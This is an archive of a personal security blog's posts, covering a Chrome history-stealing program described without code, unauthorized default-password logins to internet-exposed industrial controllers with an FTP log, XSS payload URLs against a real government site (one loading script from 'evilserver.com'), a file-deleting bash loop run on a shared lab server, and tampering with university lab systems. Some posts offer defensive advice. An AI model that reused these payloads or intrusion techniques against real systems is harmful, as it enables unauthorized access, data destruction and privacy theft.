Category Archives: Security

historyStealer

I have started writing some malicious code for fun lately. The first one is a chrome history stealer. As the name goes, it uploads the history file to a remote FTP server of the attacker’s choice.

Why History?
I believe in this quote

“Show me a man’s browser history, i will tell you who he (is) (was) (will be)”

Browser history is one of the most sensitive information on your computer, it can be as sensitive as a passwd file. The reason being, the amount of time people spend on the Internet. Going through one’s browsing history is like pop opening one’s brain and walking right through it. The whole human thought process can be visualized on examining a browser history.

Okay, you’ve got me watching pr0n, is that it?
Browser history contains more interesting things to analyze than just to determine if someone is watching pron or not. It is like robbing a car parked on the garage of an unlocked house, instead of going for the whole house. Browser History contains patterns, what you like, what you don’t like. What you do when you are happy, what you do when you are sad. Who do you stalk on Facebook, what all the shameless ‘How to’s’ you googled for. Infact, this the patttern which Google uses to determine appropriate ads for you and display. In other words the Internet’s browsing pattern is worth 42 Billion $.

The pattern can be used to predict behavior, uncover lies, expose desires, determine knowledge and even more. A wonderful research area would be to work on generating a model based on browser history which would determine/predict/assert possible actions that might be taken by the owner of the browser history.

Code:
I decided to write this one off in C#, to stay in touch with it since my initial encounter on last summer. A throwaway free hosting account is all you need to get started with this. The downside of free hosting was, i cannot have a single file of more than 10Megs in size.
Hence i had to compress the file before uploading.

DISCLAIMER: Do not run this code on a machine without the owner’s permission, For education purposes only.

Advertisements

Quora’s anonymous answers and Facebook Graph Search

The reason for providing an Anonymous answering functionality is to prevent someone from tracing the answer back to you (perhaps to prevent a flame war or you getting fired or God knows what could happen). But if you give reasonable information in your anonymously written answer, which in combination with your  badly configured Facebook profile, can be quite lethal to you.

Let us take this answer for an example. From the question and the answer, anyone can understand that the OP was a student at College of Engineering, Guindy, An ex-employee at Voltas and a current student at North Carolina State University.

The below mentioned Facebook Graph Search query seems to pick the right individual

People who studied at College of Engineering, Guindy and worked at Voltas and study at North Carolina State University

It is evident that people are not quite aware of their involuntary privacy leak through their Facebook profile, there is no reason why you have to make all these information about your grad school, previous employers; public. People may say, it helps their lost friends to get back in touch with them, which i agree, but at what cost?

Facebook Graph Search is a two edged sword that can be quite useful as it was to me when i used it to reunite with a family friend after nearly 14 years of no contact and also be equally dangerous as in the anonymous poster’s case!

ps: This post has nothing to do with my recent outrage against CEG. Infact, i agree with the OPs answer 🙂

The Internship

If you are looking for a heads up review about the upcoming movie ‘The Internship‘ then you are probably in the wrong place, but i wouldn’t force you to skip reading this post. This post is rather a dramatical one, a collection of events that happened during the last couple of days in my life, which led to a Summer Internship offer.

Winter break of 2012-13: I was looking for a online stock market simulation game, like the good old rediff money to practice my trading skills, but had no luck in finding one, most of them were paid ones and the rest were absolute BS.

Early March 2013: Vignesh’s facebook feed showed something interesting, he was using an iPhone app, which was exactly the one i was looking for. what to say, ‘like minds think alike’.

Early March 2013: I made some wise investments and already started reaping out profits, had almost a constant 3% ROI.

Mid March: Thanks to my third quarter examinations which coincided with Cyprus’s credit rating getting downgraded to crap, i was not online for a couple of days till my exams got over and guess what, every stock i had suffered a 7-10% loss. Vignesh made a smart move to sell them when they started to fall and decreased his loss ratio, but i crossed beyond that point and made almost a 2K$ loss in a week.

27th March (whatsapp conversation):
……….
……….
Vignesh: Flaw with ———-
Vignesh: I found one
Me: To change the values?
Vignesh: 28% Increase
Me: How come?
Vignesh: It showed 14% when i was about to sell but after selling it showed a 28% increase
Vignesh: Probably because of bad internet at college
………….
………….

28th March: I started to pentest the application, had a breakthrough the first day, but wasn’t able to exploit anything.

29th March – 2nd April: Was hanging out with Sathya anna and his TCS folks at Gothenburg, i was explaining about my area of interest in security to kaushik, who happened to be a program manager/consultant in TCS and suddenly an idea to exploit the app sparked in my mind.

2nd April: Successfully exploited the app and had an ROI of 432% 😛

3rd April: Contacted the Lead developer of that app to report security problems

3rd April: Received a e-mail from CTO of that company thanking for reporting it and a possible employment offer

3rd April: I showed interest in working with them.

3rd April: I was asked to take a ACM-ICPC style programming test which i took the same day mid night

4th April: Skype Interview with the CTO and a formal contract was offered.

Credit goes to Vignesh, if it wasn’t him i would have never used this awesome application and if it wasn’t his whatsapp message, perhaps i would have never thought about testing it for flaws.

Low-Medium Critical Infrastructure Security

As the Internet says

                              Security is as strong as it’s weakest link.

While researchers are busy with analyzing stuxnet and duqu, there exists a wide range of ICS on the internet with relatively less or almost no security at all.  Current research covers just the high critical targets while low-medium critical targets or almost ignored. I wouldn’t say that the strategy of researchers are wrong, they are right, it is the right choice to protect a oil refinery from a intruder rather than protect a water treatment plant of a golf course. It must be the responsibility of the vendors to protect against such attacks; actually it doesn’t requires that much of a path breaking research to protect these (low-medium critical) devices, the right architecture and right configuration is what all it needs to secure these devices.

I don’t know how many would believe if i say i’ve saw this thing many times before the news even broke out. It was just hanging around in Shodan. The default password was 100 or 101 i believe, if my memory cells are still intact. One does not need a high probability NIDS to protect the infrastructure of these devices, since they are hardly being targeted by industrial/political espionage or terror attacks. People who hijack these devices are simple script kiddies or psychopaths.

I’m not saying that the security of low-medium critical systems should be taken lightly, but instead of leaving it alone just like that without any protective measures, with the time being i think few very basic solutions by the vendors or Infrastructure Admin might keep those script kiddies away.

By basic solutions i mean,

* Make VPN support available out of the box

* Banner display to show last logged in time, IP and host names.

* Strong Passwords

* Clean or deceptive banners, after all that is how Shodan identifies you.

* Strip out legacy services like FTP, SNMP.

* A sticker which says “Do not connect this thing to internet without a basic VPN” 🙂

MiTM

MiTM attacks on Open WiFi Hotspots

Since it is so trivial to set WiFi Hotspots as open networks in order to reduce the complexity of the infrastructure setup; A question arises how one can remain safe from MiTM attacks which takes advantage of the inherent trust between the connecting client and the Access Point. As Vivek Ramachandran in his series of WiFi security primer video says there is no way for the client to authenticate the Access Point to which it is connecting to.

If you are a novice in wireless security, then first para might sound like selvaraghavan’s movie;  I’ll explain how MiTM attacks are performed on open (networked) Access Points [WiFi Hotspots to be in precise].

MiTM is popularly called as Man in the Middle Attack or you can use Hak5 Darren’s expansion Monkey in the Middle Attack. In case of a open network all the data as well as management 802.11 (wifi) packets traveling around you in the air are unencrypted, though the management packets  are unencrypted even in WEP and WPA networks, but that’s a different story.

Few of the Management Packets are

* Beacon Packet
* Probe Request, Response
* Authentication Request, Response
* Association Request, Response
* Disassociation Request, Response
* De Authentication Request, Response

In order to perform a MiTM attack the attacker must make the clients connected to the original AP to connect to him. The attacker can achieve this by keep on performing a Deauth attack on the access point, thereby disconnecting all legitimate clients from the legitimate AP and use airbase-ng to setup a fake AP in the same name as the legitimate AP thereby attracting the users towards him. Signal strength need not to be higher than the legitimate AP, because the legitimate AP is hammered by a continuous deauth attack.

Assume that the WiFi Hotspot’s network is like this and the network name is freewifi, At normal working case, the client happily connects to the free wifi access point and transfers data

 

The Attacker may start sending De Auth Broadcast Management packets for the bssid of free wifi thereby making all the clients to disconnect from freewifi Access point.

Next the Attacker sets up his own Access Point by the name of freewifi, but with a different bssid using airbase-ng, since the attacker’s fake AP advertises itself as freewifi, the client goes ahead and connects to the attacker’s AP. This is where the inherent trust of the client over AP is exploited.


Now that the client is connected to us believing that we are the freewifi access point and sends data(unencrypted) to us and we happily intercept the data monitor it and forward it to internet through our  source either using a 3G phone or a data card. We have the option to tamper, monitor, modify the user’s data.

Detecting MiTM Attacks:

So now,  if we have something in the host(client) computer that verifies the AP’s BSSID (mac id), it would be easy to find out a MiTM attack. You may think “Mac spoofing is a peice of cake and what if the attacker launches his duplicate AP with the same bssid (mac id) as the legitimate ones, The Verification mechanism will be rendered useless right?” My answer is Yes, but No. If the attacker changes the BSSID of the fake AP which he created using airbase-ng as the same one as legitimate AP’s he would end up deauthenticating his fake AP aswell as both have same SSID. so technically, unless the attacker has a high gain, directional antennae, he would not change the BSSID of his fake AP to reflect the original AP.

Now, i plan to follow up this with a python daemon program, which manages a file with list of AP’s along with its BSSID’s, so whenver you are connected to a network it checks whether you had previously connected to that network or not. if yes, it checks the BSSID which will be different in case of a MiTM and same in case of Normal usage.

University Lab Fun (in)security

As an Ex Electrical Engineering Student, i didn’t have opportunities to take many computer science lab courses, as neither the course work nor the electives were flexible.

You know it right, its ANNA UNIVERSITY.

But,thanks to the IT boom, i had

  • Fundamentals of Computer Lab
  • Data Structures Lab
  • Objected Oriented Programming Lab
  • Communication Lab [English]
  • Power System Simulation Lab

Let me walk you through the fun stuffs which i/we had during these labs.

Fundamentals of Computer Lab:

As I was a Fresher,I stayed below the radar and didn’t try anything adventurous. So it typically went like normal lab sessions.

Data Structures Lab:

The lab was entirely based on C, so we were given an unique user id and password, which was merely our roll numbers [ee199 is mine], sadly there was no provision to change the default password. The user id-password was for mounting the user specific directories to the system, so that students could store their programmes on their respective shares. As I was a sophomore at that time, I limited myself to logging into other user’s account and deleting their programs, nothing other than that because i was a bit coward at that time, yeah you read it right i was coward at THAT TIME.

Objected Oriented Programming Lab:

We did C++ and Java, it was the third year and, I was peaking in presentations and coding competitions. The only difference between data structures lab and OOP lab setup was the GUI. We had access to the windows ME machine in OOP lab, whereas in the DSA(Data Structures and Algorith) lab we were given with DOS & Turbo C. The storage part was lamer than the previous lab, as the programs were saved in /bin/ of C drive, and guess what, the c Drives were Shared over the network, so i had to just browse down to a specific user’s bin directory [//system22/c/] and change his/her programs to some random shit, like displaying weird characters on the screen in different colors and running through a infinite loop.

However during the later part they [system admins], were smart enough to change the program storage/execution directory to a NFS, which used to get mounted at the time of logging in. But they were not smart enough to change the password of the server to anything other than “peccc5lab”, so my job became easier. start->run-> //cc5server/c$/eee would list all users’ directories starting from ee101 to ee230 where their programs are stored. Pwnd!

Communication Lab [English]:

It was the same laboratory as the OOP , the lamest lab which I had, it was something similar to the TOEFL exam, The questions used to be generated from a database, and the database file was luckily running from the cc5server which I mentioned above, so I was able to change the questions to anything I want.The funniest part was that, I could have even done the same for the university exams. The procedure was, to send the users database file to Anna University in which the marks were present according to the answers they provided. Before the University Exam, I had the opportunity to view the users.mdb file [//cc5server/c$/exam/users.mdb], surprisingly the marks were encrypted, i thought of copying the encrypted value of my class topper to mine, but what if the marks were encrypted with the roll number as key. So, if i had swapped my marks, it wouldn’t have been able to decipher it, and i would have got landed in a lot of trouble!, so I refrained from doing it.. I even tried to take a look at the .asp file which pulls the questions and reports the answer back, but time didn’t permit and the staffs walking around the lab was watching me as if i looked like a Alien.

Other than this, I used to cause havoc between students using net sent commands. It was a simple trick, As the c drives used to be shared, I used to change the autoexec.bat of system-y to something like

  • @echo off.
  • net send system-x hey as***le !
  • start c:elclient.exe

and change the shortcut link for EL client to open the autoexec,bat file. So when the user in system-y opens his EL client, System-x used to recieve a message displaying as***le! sent from system-y. So it was fun to see the users in system-x and system-y fight with each other.

Ps: EL client is the software in which we used to work, i hardly opened that software.

Power System Simulation Lab:

I have already blogged about this, you can check it here

Operating Systems Lab at SVCE:

Thanks to the Jump start 2 for bringing back the fun part again. This time it was OS lab and we were taught with basic linux commands like ls,chmod,cat,editors [vi] [for some reason the instructor never mentioned emacs, emacs FTW] ,and some pretty basic stuffs. It was easy for me, no i’m not blaming the instructor. they had to cover each and every student, and many of them did not have any idea on either Linux and computers or Rankine cycle, but they used to brag about that they were the mec*sterz ,meh. But she [ the instructor] did not ask me to close my terminal, in which I was teaching my friend about grep and pipe, Never mind. And in the exercise, each user was asked to create files on their home directory i.e exam01…. exam01 was the username given to 90% of the users on that session. Again it was a NFS [Network FIle System], as the files created by each user started appearing in every users’ home directory, some mothafucka created files with filenames that hurt my friend. So the evil inside BORIS stepped out to cook a bash script [evil.sh]

	#!/bin/bash
	for((; ; ) )
	rm /exam/exam01/*
	sleep 60

chmod a+x evil.sh

../evil.sh &

and the charming script was running in the background, which deleted every file users created to learn on that lab. I’m now guilty of making no one to use of the OS lab, I wouldn’t have done it, if the file names were not that rude.

Ps: If you are creating a lab environment for students, then better rely on NFS with different passwords or share less local system disk with limited user privileges.

Pps:Try these at your own risk

Thats it for now, I’m tired of typing from 6:30 pm, and now the time is 9:09pm & thanks to vignesh for editing this post

Good Bye,alvida!

SCADA/ICS Insecurity

Hi guys, Long time no see, ‘was been busy with placements , FYP, people bragging about the offers they’ve got, really Sick time.

Recently i’ve been questioned by the University at the project review for choosing a project in a computer science stream besides i’m being in EEE. To prove them that it was not merely a computer science project i did some research ,and guess what it was astonishing; I’ll share few details about it in this article.

With the Advancement in Technology and Internet flourishing people want all their products ranging from IPOD to SUV’s, Microwave oven to toilet closet :P, Connected to the Internet, so that they could access/control/monitor it from anywhere. The advancement in technology had not only changed the public’s mindset but also the corporate’s mind set too. Now days every manufacturing process in a Industry are controlled by automated systems [Industrial Control Systems (ICS)/Supervisory Control and Data Acquision Systems (SCADA)]. These ICS are also SOMETIMES connected to the Internet. I still could not figure out why the hell they do it. A typical Industrial Control System Network will be like this [It might be a bit complex, but this is a

SCADA Architecture
SCADA

Skeptical representation of it.]  The RTU’s [Remote Terminal Units] are now usually PLC’s [Programmable Logic Controllers, which is an hybrid RTU with reprogramming capablities] , To be simple PLC is something like an advanced Microcontroller which could directly interact with the Industrial Components like Boilers, Pressure Sensors, Turbines etc. DAS is usually a database server which is used for data acquision.A typical Data logged into DAS will be something like, boiler temperature,pressure with respect to time and some other necessary parameters.

HMI [Human Machine Interface]: It is a central Server with huge monitors connected to it displaying various process on going in the plant.It is also used to command and control the PLC’s.This HMI’s nowdays comes up with a webserver like setup, so that the supervisory team of the Powerplant/Industry could connect from their desktop to this HMI server. Sorry for boring u guys, i know, an electrical engineering lecture will always be vague, lets get into the security part.

My aim was to prove that SCADA systems would pose a huge risk if the network admin was obsolete to block internet access to HMI’s or even to some other controllers.

Day1: Started Searching For SCADA systems, it was something like searching a nano particle in a ocean.Tried of using Google. Later that day i came to remember something which i really missed for a long time, and its none other than the SHODAN search engine. I was glad to see that someone had already posted the search queries for several SCADA systems in Shodan’s popular search tab. I took Schneider’s tac xenta controllers as a test sample for my research. And Day1 ended with a bunch of IP addresses from SHODAN.

Tac xenta is a product of Schneider electric which acts as a controller/connecter for numerous RTU’s running over MODBUS/C-BUS/BacNet and a variety of protocols. It collects the data from these devices and integrates it with LonWorks to provide a real time feed of what’s happening in the infrastructure.

Day2:Tried logging into it with some common passwords, scanned with nmap, everything ended up in vain. Suddenly i thought of an idea, why not try finding the documentation of the product, as the exact version number is being displayed on its login page. Before Proceeding further i was day dreaming of myself social engineering the company’s marketing team to handover their documentation of the specific version of their product by impersonating myself as a potential buyer. But sadly i was able to find out the product’s documentation by just googling it [Tac xenta 913]. I was able to see the default password after reading some quarter of the documentation.On testing the default password with the bunch of targets i had, many systems granted access to it.After reading the documentation i learned that, that device also comes with a ftp server.

ftp> open X52.X.1X.2X
Connected to X52.X.1X.2X.
220 FTP Server Ready
User (X52.X.1X.2X:(none)): xxxx
331 Password required
Password:
230 Logged in
ftp> dir
200 OK
150 Opening connection
drwxrwxrwx 1 usr usr 0 Jan 01 00:00 ram
drwxrwxrwx 1 usr usr 0 Jan 01 00:00 sys
drwxrwxrwx 1 usr usr 0 Jan 01 00:00 www
drwxrwxrwx 1 usr usr 0 Jan 01 00:00 mmc
drwxrwxrwx 1 usr usr 0 Jan 01 00:00 configdb
drwxrwxrwx 1 usr usr 0 Jan 01 00:00 wm
drwxrwxrwx 1 usr usr 0 Jan 01 00:00 tmp
drwxrwxrwx 1 usr usr 0 Jan 01 00:00 user
drwxrwxrwx 1 usr usr 0 Aug 21 12:41 inet
drwxrwxrwx 1 usr usr 0 Apr 23 09:11 fb
drwxrwxrwx 1 usr usr 0 Jan 01 00:00 event
226 Closing connection
ftp: 458 bytes received in 0.02Seconds 26.94Kbytes/sec.
ftp>

This is the web management console of the Controller.

pwnd

So if it is this simple to intrude and take over a Industrial Control System or a Home Automation system or at least a part of it, Stuxnet is too small to worry. Seems Die Hard 4.0 will no longer be just a science fiction movie, reality is on the way.

NASA has it, And so Does DRDO

NASA has it, FBI has it, Most of the Govt agencies/organinzations has it and DRDO also has it, what is it ?

Well thats the most common security flaw in web applications  ” THE XSS (Cross Site Scripting)”.  XSS vulnerabilities are due to improper or lack of sanitization of input variables in server side scripts, which leads to execute external/embedded javascripts on the client side browser.

Vulnerable URL:

http://www.drdo.gov.in/drdo/labs/CAIR/English/index.jsp?pg=<script>alert(‘XSS is here’);</script>

The vulnerability lies in the index.jsp page, the variable “pg” is not properly sanitized, thats why it allows artibrary javascript to be included. But the goodness here is, it does not allows remote javascripts to be run.

http://www.drdo.gov.in/drdo/labs/CAIR/English/index.jsp?pg=<SCRIPT/XSS SRC=”http://evilserver.com/xss.js”></SCRIPT>

The above script will not work because, the administrator at DRDO was smart enough to set the REMOTE INCLUDE [something like that, i forgot the exact name] to DISALLOW in apache server configuration, thats why scripts within the host directory will alone run.

If the above setting [remote include]  had not been  done another serious vulnerability would have been induced, Its RFI [REMOTE FILE INCLUSION]

From the above URL’s it is pretty obvious that the index.jsp’s pg variable includes the local jsp page [awards.jsp/Director.jsp] in the frame, so if the remote include feature had been set on, we could have uploaded a jsp shell script on our server and we could included it inside index.jsp.

so that it will get executed on DRDO’s server and w00t, DRDO would have been r00t’ed.

This Vulnerablility had been reported to keeda/null on 17-10-10

Fun with AUPower Lab

ssSSsh yet again a boring “Design of Electrical Apparatus” class so i decided to cook this nice little article for you all,

AU power lab is the software developed by AnnaUniversity’s Power Research Group for Power Systems Simulation Lab [EE1404] which is used by most of the colleges for their Final Year EEE lab curriculum.

About the Application:

The Application has a client server architecture, the server verifies the license key/authentication key of the client machines. The Client Software which has a Sluggish Graphical User Interface is written in VC++/VB6.0. The application will be usually installed in   “C:AuPower” , you can find a lot of directories inside”C:AuPower”  some of them are

  • LFS
  • TSA
  • Acrod32 (adobe reader verison 5.0 to view the pdf help files)
  • ED         and many

Each of the Directory corresponds to a Menu which are seperate exercise for the lab curriculum

LFS  corresponds to the Load Flow Solution exercise and TSA corresponds to the Transient Stability Analysis exercise

Inside each of the directories i.e Inside LFS,TSA,ED etc there will be further 3  subdirectories

  • user
  • sample
  • work

sample directory contains some text files which bears the sample data given to the problem.

user directory contains some text files which bears the data which you entered and saved in the Grapical User Interface

work directory contains the executable files which are required for running the program and computing the output.

Well, if you are lost somewhere, let me sum it up again,When you open the AUpower lab application on your desktop you’ll be presented with several menus each corresponding to a exercise viz Load Flow  Analysis, Economic Dispatch etc, when you click a particular option what happens is the respective program for data collection gets started this program will be inside C:AuPowerClickedMenu’s AbbrevatedFormwork.

In some exerices a CommandPrompt [DOS prompt] will appear and you need to enter your options after entering those options the program runs and produces the output.

The Fun:

Due to lack of application security in the AUPowerlab software, it fails to verify the authenticity of the called program by the main application. It means you can create a custom executable file and you can replace it with the original so that when when the application is run, your executable comes up instead of the original executable.

We are going to exploit this security flaw to make fun out of AUPower Lab, Lets use Economic Dispatch exercise as our target 😛

Goto               C:AuPowerED*(im not sure with this name, it will start some thing like ED)work

you will see 2 files without any ICON

  • ED*L.exe                [again pardon me for not remembering the exact file names]
  • ED*NL.exe

ED*L.exe is for problem with Losses and ED*NL.exe is for problem without losses, we have problem without loss alone in our syllabus, so we are going to create another executable in the name of ED*NL.exe and replace it with the original.

Most of the PC’s in PS lab has TurboC++ installed, so cook a funny C++/C program and make it as a executable

here is my program

#include<iostream.h>

int main (void)

{

char a,b,c;

cout << “You are not a human, are you : <Yes:y No:n>: n”;   Thanks to chokkalingam for teaching question tags 😛

cin >> a;

cout << “You are a ************ : <Yes:y No:n>: n”;

cin >> b;

cout << “Do u really wanna output for this programme: <Yes:y No:n>: n”;

cin >> c;

if (( c == ‘Y’) || (c==’y’))

{

cout << ” Dumb ‘O , Im not your slave, Compute the ****** Output yourself with ur ****** Calculator n”;

}

return 0;

}

Now compile this programme and make it as a executable [hope u ‘d be familiarized with TurboC], the executable will be in a directory “OUT” inside tc, i.e  C:TCout  or C:TCbinout, so grab your executable from here and paste it inside C:AuPowerED*work,  Dont forget to change the rename your execulable as exactly as ED*NL.exe.

Now call your victim to test it,ask him/her to teach this exercise after entering the data and saving it and clicking run, instead of the original executable your executable will run and see how many of your friends press three Y’s without seeing what is being displayed in the screen..

Prevention:

Inorder to prevent these kind of executable corruption attacks, you can design the called programme to send a authentication key to the main programme so that it could ensure the authenticity of the called programme, however this technique could be breaked, if the attacker examines the executable fille in debugger, he could get hold of the key being passed to the main programme and he could specify the same key in his custom programme and again corrupt it, so the best bet is to use some preshared key exchange kind of techniques.

Have Fun Hacking !!  🙂